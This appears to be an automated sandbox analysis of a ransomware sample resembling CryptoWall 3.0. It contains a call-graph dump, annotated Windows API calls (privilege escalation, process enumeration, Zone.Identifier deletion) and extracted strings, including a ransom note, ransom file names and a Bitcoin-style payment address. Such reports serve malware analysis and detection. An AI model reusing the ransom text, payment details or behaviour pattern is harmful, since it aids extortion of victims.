22274->22275 22277 41ddca 22275->22277 22277->22000 22279 41dd51 22278->22279 22280 424820 __NMSG_WRITE 66 API calls 22279->22280 22281 41dd67 CreateFileW 22280->22281 22281->22274 22282 41dd90 WriteFile FlushFileBuffers CloseHandle 22281->22282 22282->22274 22284->21945 22285->21947 22286->21949 22287->21951 22288->21978 22289->21982 22294 42442e 22290->22294 22291 424432 22292 42570d __commit 66 API calls 22291->22292 22293 41db1d 22291->22293 22298 42444e 22292->22298 22293->22003 22294->22291 22294->22293 22295 424475 22294->22295 22295->22293 22297 42570d __commit 66 API calls 22295->22297 22297->22298 23519 425a62 11 API calls __commit 22298->23519 22299->22014 22300->21943 22307 427576 22301->22307 22305 427576 __getptd 66 API calls 22304->22305 22306 42532f 22305->22306 22306->22141 22308 4274fd __getptd_noexit 66 API calls 22307->22308 22309 42757e 22308->22309 22311 425322 22309->22311 22312 42524d 66 API calls 3 library calls 22309->22312 22311->22141 22313->22151 22318 424225 22314->22318 22317->22199 22321 424135 22318->22321 22320 41df54 CreateFileW GetLastError CloseHandle 22320->22189 22320->22190 22322 424140 22321->22322 22323 424155 22321->22323 22324 42570d __commit 66 API calls 22322->22324 22325 424166 22323->22325 22327 42418d 22323->22327 22326 424145 22324->22326 22328 42570d __commit 66 API calls 22325->22328 22336 42416b 22325->22336 22352 425a62 11 API calls __commit 22326->22352 22330 42570d __commit 66 API calls 22327->22330 22349 424182 22328->22349 22332 424192 22330->22332 22331 424150 22331->22320 22334 4241c9 22332->22334 22335 42419f 22332->22335 22354 42403f 97 API calls 2 library calls 22334->22354 22353 42403f 97 API calls 2 library calls 22335->22353 22336->22320 22339 4241d7 22341 4241ff 22339->22341 22344 4241ec 22339->22344 22340 4241ae 22340->22341 22342 4241b6 22340->22342 22341->22336 22347 42570d __commit 66 API calls 22341->22347 22343 42570d __commit 66 API calls 22342->22343 22345 4241bb 22343->22345 22346 42570d 
__commit 66 API calls 22344->22346 22345->22336 22350 42570d __commit 66 API calls 22345->22350 22348 4241f1 22346->22348 22347->22349 22348->22336 22351 42570d __commit 66 API calls 22348->22351 22355 425a62 11 API calls __commit 22349->22355 22350->22336 22351->22336 22352->22331 22353->22340 22354->22339 22355->22336 22357 401af3 RegCreateKeyExW RegQueryValueExW 22356->22357 22358 401a69 RegQueryValueExW 22356->22358 22360 401b30 22357->22360 22361 401b7a 22357->22361 22358->22357 22359 401a87 22358->22359 22363 402de0 97 API calls 22359->22363 22364 401b56 RegSetValueExW RegFlushKey 22360->22364 22450 41ae10 22360->22450 22466 402de0 22361->22466 22366 401adb RegCloseKey 22363->22366 22364->22361 22366->22204 22367 401b53 22367->22364 22370 417933 22369->22370 22372 41798a 22370->22372 22374 41796f 22370->22374 22556 40e8b0 22370->22556 22373 40e8b0 66 API calls 22372->22373 22372->22374 22375 417a9a 22372->22375 22373->22375 22374->22205 22375->22374 22376 40e8b0 66 API calls 22375->22376 22379 417baf 22375->22379 22376->22379 22379->22374 22380 417c93 22379->22380 22528 418190 22379->22528 22380->22374 22532 418a50 22380->22532 22381 417cff 22381->22374 22382 40e8b0 66 API calls 22381->22382 22383 417d4b 22381->22383 22382->22383 22383->22374 22384 40e8b0 66 API calls 22383->22384 22385 417e6f 22383->22385 22384->22385 22385->22374 22386 40e8b0 66 API calls 22385->22386 22391 417fa4 22385->22391 22386->22391 22390 4180a3 22390->22374 22560 418820 66 API calls _memmove 22390->22560 22391->22374 22537 40ea20 22391->22537 22394 401931 _memset 22393->22394 22727 402dc0 22394->22727 22396 401961 _memset 22397 4019ca RegCreateKeyExW RegQueryValueExW RegCloseKey 22396->22397 22398 423ebb TranslatorGuardHandler 5 API calls 22397->22398 22399 401a18 22398->22399 22399->22209 22400 402030 22399->22400 22401 4020b3 22400->22401 22402 418a50 66 API calls 22401->22402 22403 4020d5 22402->22403 22730 4182b0 22403->22730 22405 4020e3 22406 418a50 66 API calls 22405->22406 
22407 4020f3 _memset 22406->22407 22734 40ea80 22407->22734 22409 402188 22412 4021bf 22409->22412 22819 419090 67 API calls 2 library calls 22409->22819 22411 40220c 22738 4183d0 22411->22738 22412->22411 22820 414cd0 22412->22820 22415 40222e 22416 40e920 66 API calls 22415->22416 22418 40224b 22415->22418 22416->22418 22417 40ea80 66 API calls 22419 40229c 22417->22419 22418->22417 22420 40ea80 66 API calls 22419->22420 22421 4022ac 22420->22421 22422 40ea80 66 API calls 22421->22422 22423 402328 22422->22423 22742 412640 22423->22742 22425 402356 22749 424296 22425->22749 22428 424005 _free 66 API calls 22429 402380 22428->22429 22758 41f020 22429->22758 22431 40243d _memset 22432 41f020 5 API calls 22431->22432 22433 4024af 22432->22433 22434 41f020 5 API calls 22433->22434 22435 4024c7 22434->22435 22766 401270 22435->22766 22439 40253a ctype _memmove 22817 42434b GetSystemTimeAsFileTime 22439->22817 22441 402585 ctype 22442 423ebb TranslatorGuardHandler 5 API calls 22441->22442 22443 401c5c 22442->22443 22444 401840 22443->22444 22445 40186e _memset 22444->22445 22446 402dc0 97 API calls 22445->22446 22447 401889 RegCreateKeyExW RegSetValueExW RegFlushKey RegCloseKey 22446->22447 22448 423ebb TranslatorGuardHandler 5 API calls 22447->22448 22449 4018f8 22448->22449 22449->22209 22451 41ae50 22450->22451 22452 41ae39 22450->22452 22457 41ae89 22451->22457 22469 41b2c0 GetVersionExW LoadLibraryW LoadLibraryW LoadLibraryW 22451->22469 22453 423ebb TranslatorGuardHandler 5 API calls 22452->22453 22454 41ae4c 22453->22454 22454->22367 22459 41af1d _memset 22457->22459 22518 41aab0 66 API calls 2 library calls 22457->22518 22460 41b158 22459->22460 22519 419db0 66 API calls 22459->22519 22520 419db0 66 API calls 22460->22520 22462 41b166 _memset 22462->22452 22463 41b1e8 22462->22463 22464 423ebb TranslatorGuardHandler 5 API calls 22463->22464 22465 41b1f8 22464->22465 22465->22367 22467 424225 __strftime_l 97 API calls 22466->22467 22468 401bce RegCloseKey 
22467->22468 22468->22204 22470 41b331 GetProcAddress GetProcAddress 22469->22470 22471 41b413 22469->22471 22472 41b355 22470->22472 22473 41b40c FreeLibrary 22470->22473 22474 41b51c 22471->22474 22475 41b41f GetProcAddress GetProcAddress GetProcAddress 22471->22475 22472->22473 22478 41b35d NetStatisticsGet 22472->22478 22473->22471 22476 41b524 12 API calls 22474->22476 22477 41b859 22474->22477 22479 41b511 FreeLibrary 22475->22479 22491 41b451 22475->22491 22480 41b852 FreeLibrary 22476->22480 22481 41b5c2 22476->22481 22521 41b900 22477->22521 22483 41b3b5 NetStatisticsGet 22478->22483 22486 41b373 22478->22486 22479->22474 22480->22477 22481->22480 22493 41b624 CreateToolhelp32Snapshot 22481->22493 22483->22473 22488 41b3cd 22483->22488 22486->22483 22487 41b8b8 22490 423ebb TranslatorGuardHandler 5 API calls 22487->22490 22488->22473 22489 41b875 GetCurrentProcessId 22489->22487 22492 41b8fb 22490->22492 22491->22479 22492->22457 22493->22480 22494 41b636 22493->22494 22495 41b656 Heap32ListFirst 22494->22495 22496 41b64a GetTickCount 22494->22496 22497 41b6f9 22495->22497 22510 41b668 22495->22510 22496->22495 22498 41b713 Process32First 22497->22498 22499 41b70b GetTickCount 22497->22499 22500 41b75e 22498->22500 22504 41b728 22498->22504 22499->22498 22503 41b770 GetTickCount 22500->22503 22511 41b778 22500->22511 22501 41b67d Heap32First 22502 41b6dd Heap32ListNext 22501->22502 22501->22510 22502->22497 22505 41b6ef GetTickCount 22502->22505 22503->22511 22504->22500 22509 41b758 GetTickCount 22504->22509 22505->22497 22505->22510 22506 41b6c5 Heap32Next 22506->22510 22507 41b7c3 22508 41b7d5 GetTickCount 22507->22508 22516 41b7dd 22507->22516 22508->22516 22509->22500 22509->22504 22510->22501 22510->22502 22510->22506 22511->22507 22515 41b7bd GetTickCount 22511->22515 22512 41b836 22513 41b847 CloseHandle 22512->22513 22514 41b83e 22512->22514 22513->22480 22514->22480 22515->22507 22515->22511 22516->22512 22517 41b830 GetTickCount 22516->22517 
22517->22512 22517->22516 22518->22457 22519->22459 22520->22462 22522 41b95d GetTickCount 22521->22522 22523 41b90f QueryPerformanceCounter 22521->22523 22525 41b96f 22522->22525 22524 41b91d 22523->22524 22527 41b924 22523->22527 22524->22522 22526 41b85e GlobalMemoryStatus 22525->22526 22526->22489 22527->22522 22527->22526 22529 4181a2 22528->22529 22530 4181f6 22529->22530 22561 414780 22529->22561 22530->22380 22533 418a5b 22532->22533 22534 418a60 22532->22534 22533->22381 22534->22533 22716 421990 22534->22716 22535 418aad 22535->22381 22538 40ea34 22537->22538 22539 40ea2d 22537->22539 22538->22374 22541 418740 22538->22541 22540 40e8b0 66 API calls 22539->22540 22540->22538 22542 418799 22541->22542 22543 41874d 22541->22543 22542->22390 22544 418a50 66 API calls 22543->22544 22547 418758 22543->22547 22544->22547 22545 418788 22548 40e920 66 API calls 22545->22548 22546 41879f 22549 40e8b0 66 API calls 22546->22549 22550 418792 22546->22550 22547->22542 22547->22545 22547->22546 22548->22550 22549->22550 22550->22542 22551 4187e3 22550->22551 22552 4187ce 22550->22552 22554 40e8b0 66 API calls 22551->22554 22555 4187d8 22551->22555 22553 40e920 66 API calls 22552->22553 22553->22555 22554->22555 22555->22390 22557 40e8be 22556->22557 22559 40e8c4 22556->22559 22719 40e7d0 22557->22719 22559->22372 22560->22374 22562 41479e 22561->22562 22563 4147d9 22562->22563 22569 40fa10 22562->22569 22563->22530 22565 4147fa 22565->22563 22598 40f350 66 API calls 22565->22598 22567 414822 22567->22563 22599 4151c0 67 API calls 22567->22599 22570 40fa2e 22569->22570 22573 40fa3f 22569->22573 22570->22573 22665 40cf20 66 API calls _memmove 22570->22665 22572 40fa76 22572->22565 22573->22572 22574 40fa88 22573->22574 22575 40e8b0 66 API calls 22573->22575 22600 40e920 22574->22600 22575->22574 22577 40fb38 22604 40ed70 22577->22604 22578 40fac1 22578->22572 22578->22577 22579 40e8b0 66 API calls 22578->22579 22579->22577 22581 40fb65 22581->22572 22610 40d820 
22581->22610 22583 40fbae 22583->22572 22666 412930 22583->22666 22585 40fbc6 22585->22572 22586 40fbea 22585->22586 22587 40fbdb 22585->22587 22589 40ea20 66 API calls 22586->22589 22672 413230 66 API calls 22587->22672 22590 40fbe5 22589->22590 22590->22572 22673 40d190 22590->22673 22592 40fc11 22592->22572 22593 40ea20 66 API calls 22592->22593 22594 40fc53 22593->22594 22594->22572 22595 40ed70 67 API calls 22594->22595 22596 40fc65 22595->22596 22596->22572 22597 40d190 67 API calls 22596->22597 22597->22572 22598->22567 22599->22563 22601 40e93a 22600->22601 22603 40e942 22600->22603 22602 40e8b0 66 API calls 22601->22602 22601->22603 22602->22603 22603->22578 22605 40ed8d 22604->22605 22606 40ede4 _allshl 22605->22606 22607 40e8b0 66 API calls 22605->22607 22609 40eda2 22605->22609 22606->22581 22607->22609 22608 40edb8 22608->22581 22609->22606 22609->22608 22611 40df38 22610->22611 22612 40d849 22610->22612 22713 40df50 67 API calls 22611->22713 22612->22611 22614 40d853 22612->22614 22616 40d86b 22614->22616 22709 40cf20 66 API calls _memmove 22614->22709 22615 40df44 22615->22583 22705 40cec0 22616->22705 22620 40cec0 66 API calls 22621 40d88b 22620->22621 22622 40cec0 66 API calls 22621->22622 22623 40d894 22622->22623 22624 40cec0 66 API calls 22623->22624 22625 40d89d 22624->22625 22626 40cec0 66 API calls 22625->22626 22627 40d8a4 22626->22627 22628 40cec0 66 API calls 22627->22628 22629 40d8ad 22628->22629 22630 40cec0 66 API calls 22629->22630 22632 40d8b6 22630->22632 22631 40dea4 22631->22583 22632->22631 22633 40e8b0 66 API calls 22632->22633 22635 40d8e4 22632->22635 22633->22635 22634 40d92b 22637 40e920 66 API calls 22634->22637 22635->22634 22636 40e8b0 66 API calls 22635->22636 22636->22634 22638 40d965 22637->22638 22638->22631 22639 40e920 66 API calls 22638->22639 22640 40d97e 22639->22640 22640->22631 22641 40d190 67 API calls 22640->22641 22643 40d9b6 22640->22643 22641->22643 22642 40db6f 22646 40de55 22642->22646 22712 403210 66 API 
calls 22642->22712 22643->22631 22657 40db74 22643->22657 22658 40da0c 22643->22658 22645 40ea20 66 API calls 22645->22657 22646->22631 22647 40dea9 22646->22647 22651 40de99 22646->22651 22648 40d190 67 API calls 22647->22648 22648->22631 22649 403210 66 API calls 22649->22657 22650 40d190 67 API calls 22650->22657 22653 40e920 66 API calls 22651->22653 22652 4126f0 66 API calls 22652->22657 22653->22631 22654 4127e0 66 API calls 22654->22658 22655 40ee80 _aullshr 22655->22658 22656 402f20 66 API calls 22656->22658 22657->22631 22657->22642 22657->22645 22657->22649 22657->22650 22657->22652 22660 402e80 66 API calls 22657->22660 22661 40e920 66 API calls 22657->22661 22663 412930 67 API calls 22657->22663 22711 413330 66 API calls 22657->22711 22658->22631 22658->22642 22658->22654 22658->22655 22658->22656 22662 412a80 66 API calls 22658->22662 22710 403010 66 API calls 22658->22710 22660->22657 22661->22657 22662->22658 22663->22657 22665->22573 22667 412967 22666->22667 22669 412963 22666->22669 22668 40e8b0 66 API calls 22667->22668 22668->22669 22670 4129f6 _aullshr 22669->22670 22671 412974 _memset 22669->22671 22670->22669 22670->22671 22671->22585 22672->22590 22674 40d1b5 22673->22674 22675 40d22e 22674->22675 22678 40d1f6 22674->22678 22703 40d21f 22674->22703 22676 40d246 22675->22676 22714 40cf20 66 API calls _memmove 22675->22714 22679 40cec0 66 API calls 22676->22679 22680 40d204 22678->22680 22682 40e920 66 API calls 22678->22682 22681 40d25d 22679->22681 22684 40ea20 66 API calls 22680->22684 22680->22703 22683 40cec0 66 API calls 22681->22683 22682->22680 22685 40d266 22683->22685 22684->22703 22686 40cec0 66 API calls 22685->22686 22687 40d271 22686->22687 22688 40cec0 66 API calls 22687->22688 22689 40d282 22687->22689 22688->22689 22690 412930 67 API calls 22689->22690 22689->22703 22691 40d2d4 22690->22691 22692 412930 67 API calls 22691->22692 22691->22703 22693 40d2f8 22692->22693 22694 40d36f 22693->22694 22695 40d31f 22693->22695 22696 
40d327 22693->22696 22693->22703 22694->22696 22697 40e8b0 66 API calls 22694->22697 22695->22696 22698 40e8b0 66 API calls 22695->22698 22699 40e8b0 66 API calls 22696->22699 22700 40d428 22696->22700 22696->22703 22697->22696 22698->22696 22699->22700 22701 40e8b0 66 API calls 22700->22701 22700->22703 22704 40d464 22700->22704 22701->22704 22703->22592 22704->22703 22715 412a80 66 API calls 22704->22715 22706 40cec7 22705->22706 22708 40ceda 22705->22708 22707 40e8b0 66 API calls 22706->22707 22706->22708 22707->22708 22708->22620 22709->22616 22710->22658 22711->22657 22712->22646 22713->22615 22714->22676 22715->22703 22718 424b82 66 API calls 22716->22718 22717 42199d 22717->22535 22718->22717 22720 40e7ec 22719->22720 22722 40e7e3 22719->22722 22720->22722 22723 4219b0 22720->22723 22722->22559 22722->22722 22724 4219c3 22723->22724 22726 421990 66 API calls 22724->22726 22725 4219f3 22725->22722 22726->22725 22728 424225 __strftime_l 97 API calls 22727->22728 22729 402dda 22728->22729 22729->22396 22731 4182b6 22730->22731 22732 417900 69 API calls 22731->22732 22733 4182d4 22731->22733 22732->22733 22733->22405 22735 40ea97 22734->22735 22736 40e8b0 66 API calls 22735->22736 22737 40eab8 22735->22737 22736->22737 22737->22409 22740 4183df 22738->22740 22739 418a50 66 API calls 22741 418428 22739->22741 22740->22739 22740->22741 22741->22415 22743 412662 22742->22743 22744 41265a 22742->22744 22745 4219b0 66 API calls 22743->22745 22744->22425 22746 412667 22745->22746 22747 412697 _aullshr 22746->22747 22748 4126e2 22746->22748 22747->22746 22748->22425 22753 4242a8 22749->22753 22750 4242ac 22751 42570d __commit 66 API calls 22750->22751 22752 40237a 22750->22752 22757 4242c8 22751->22757 22752->22428 22753->22750 22753->22752 22755 4242ea 22753->22755 22755->22752 22756 42570d __commit 66 API calls 22755->22756 22756->22757 22834 425a62 11 API calls __commit 22757->22834 22759 41f03a _memset 22758->22759 22835 41f0c0 22759->22835 22761 41f097 22842 

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph not reproduced; first block 41b2c0-41b32b; legend: Executed / Not Executed]
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32 ref: 0041B2FA
                                                                                                                            • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041B30B
                                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041B316
                                                                                                                            • LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041B31F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041B337
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041B343
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 0041B36D
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 0041B3C5
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B40D
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041B425
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041B433
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041B443
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0041B516
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041B52C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041B538
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041B544
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041B550
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041B55C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041B568
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041B574
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041B580
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041B58C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041B598
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041B5A4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041B5B0
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041B627
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B64A
                                                                                                                            • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 0041B65C
                                                                                                                            • Heap32First.KERNEL32(?,?,?), ref: 0041B69A
                                                                                                                            • Heap32Next.KERNEL32(?), ref: 0041B6CA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$Heap32Load$FirstFreeStatistics$CountCreateListNextSnapshotTickToolhelp32Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next
                                                                                                                            • API String ID: 1388370095-715222291
                                                                                                                            • Opcode ID: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction ID: 9b0ab41e44d741afa709f8f910670cdf3924008bcb49aeebd6d02c398950f77e
                                                                                                                            • Opcode Fuzzy Hash: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction Fuzzy Hash: D8F130706043459BD720DF65CC84B9BBBF8EFC8B44F04892EF59896250DB78D984CB9A

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph not reproduced; first block 41d4d0-41d578; legend: Executed / Not Executed]
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000067,scan,00000064), ref: 0041D519
                                                                                                                            • LoadStringW.USER32(?,0000006D,SCAN,00000064), ref: 0041D525
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E8D6
                                                                                                                              • Part of subcall function 0041E8A0: LoadCursorW.USER32 ref: 0041E8E2
                                                                                                                              • Part of subcall function 0041E8A0: LoadIconW.USER32 ref: 0041E906
                                                                                                                              • Part of subcall function 0041E8A0: RegisterClassExW.USER32(00000030), ref: 0041E90F
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0041D532
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 0041D56A
                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 0041D589
                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0041D5A0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,004C8B20), ref: 0041D5C1
                                                                                                                            • CoCreateInstance.OLE32(004365C8,00000000,00000001,00431338,?), ref: 0041D627
                                                                                                                            • CoCreateInstance.OLE32(004365D8,00000000,00000001,00431328,?), ref: 0041D63D
                                                                                                                            • ExitProcess.KERNEL32 ref: 0041D68E
                                                                                                                            • _memset.LIBCMT ref: 0041D6AA
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041D789
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041D79D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041D7AA
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,004CEB20), ref: 0041D7BD
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,004D0B20), ref: 0041D7C9
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,004D2B20), ref: 0041D7D5
                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,004D4B20,00000005,00000000), ref: 0041D7E0
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,004CAB20), ref: 0041D82E
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,004CCB20), ref: 0041D83A
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004C6B20,00001000), ref: 0041D847
                                                                                                                            • DeleteFileW.KERNEL32(004C4B20), ref: 0041D87D
                                                                                                                              • Part of subcall function 0041E7A0: CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                              • Part of subcall function 0041E7A0: SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                              • Part of subcall function 0041E7A0: ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                              • Part of subcall function 0041E7A0: CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041D89A
                                                                                                                              • Part of subcall function 0041E810: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                              • Part of subcall function 0041E810: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,435-3435-4546), ref: 0041D915
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D91B
                                                                                                                            • _memset.LIBCMT ref: 0041D937
                                                                                                                            • GetVersionExW.KERNEL32(0043C728), ref: 0041D94E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DA02
                                                                                                                            • _memset.LIBCMT ref: 0041DA17
                                                                                                                            • __wfopen_s.LIBCMT ref: 0041DA3D
                                                                                                                            • _fprintf.LIBCMT ref: 0041DA6B
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DAA2
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001E5B0,00000000,00000000,00000000), ref: 0041DABE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00013780,00000000,00000000,00000000), ref: 0041DACA
                                                                                                                            • SetThreadPriority.KERNEL32(00000000,000000F1), ref: 0041DAD1
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DAE0
                                                                                                                            • _memset.LIBCMT ref: 0041DAFD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB4D
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DB97
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041DBED
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D390,00000000,00000000,00000000), ref: 0041DBFE
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0001D4C0), ref: 0041DC0C
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A030,00000000,00000000,00000000), ref: 0041DC27
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041DC2C
                                                                                                                              • Part of subcall function 0041E050: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                              • Part of subcall function 0041E050: GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                              • Part of subcall function 0041E050: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                              • Part of subcall function 0041E050: ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            • %s%s%s%S, xrefs: 0041DA65
                                                                                                                            • \Recovery_File_, xrefs: 0041D7E6
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 0041DA54
                                                                                                                            • SCAN, xrefs: 0041D51D
                                                                                                                            • Wow64RevertWow64FsRedirection, xrefs: 0041D79F
                                                                                                                            • 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB, xrefs: 0041DA60
                                                                                                                            • E722D94C1CAC34B, xrefs: 0041D95E, 0041D963, 0041D968, 0041D96D, 0041D972, 0041D977, 0041D97C, 0041D995, 0041D99A, 0041D99F, 0041D9A4, 0041D9A9, 0041D9AE, 0041D9B3, 0041D9B8, 0041D9BD, 0041D9C2, 0041D9C7, 0041D9CC, 0041D9D1, 0041D9D6, 0041DA4F
                                                                                                                            • \RESTORE_FILES.TXT, xrefs: 0041DB1D
                                                                                                                            • scan, xrefs: 0041D511
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041D9E0
                                                                                                                            • open, xrefs: 0041DB41, 0041DB90, 0041DBE6
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041D981
                                                                                                                            • KERNEL32, xrefs: 0041D784
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041D986
                                                                                                                            • \RESTORE_FILES.HTML, xrefs: 0041DB6A
                                                                                                                            • :Zone.Identifier, xrefs: 0041D861
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041D9DB
                                                                                                                            • .txt, xrefs: 0041D80D
                                                                                                                            • Wow64DisableWow64FsRedirection, xrefs: 0041D797
                                                                                                                            • 435-3435-4546, xrefs: 0041D90E
                                                                                                                            • SeDebugPrivilege, xrefs: 0041D894
                                                                                                                            • \RESTORE_FILES.BMP, xrefs: 0041DBB4
                                                                                                                            Memory Dump Source
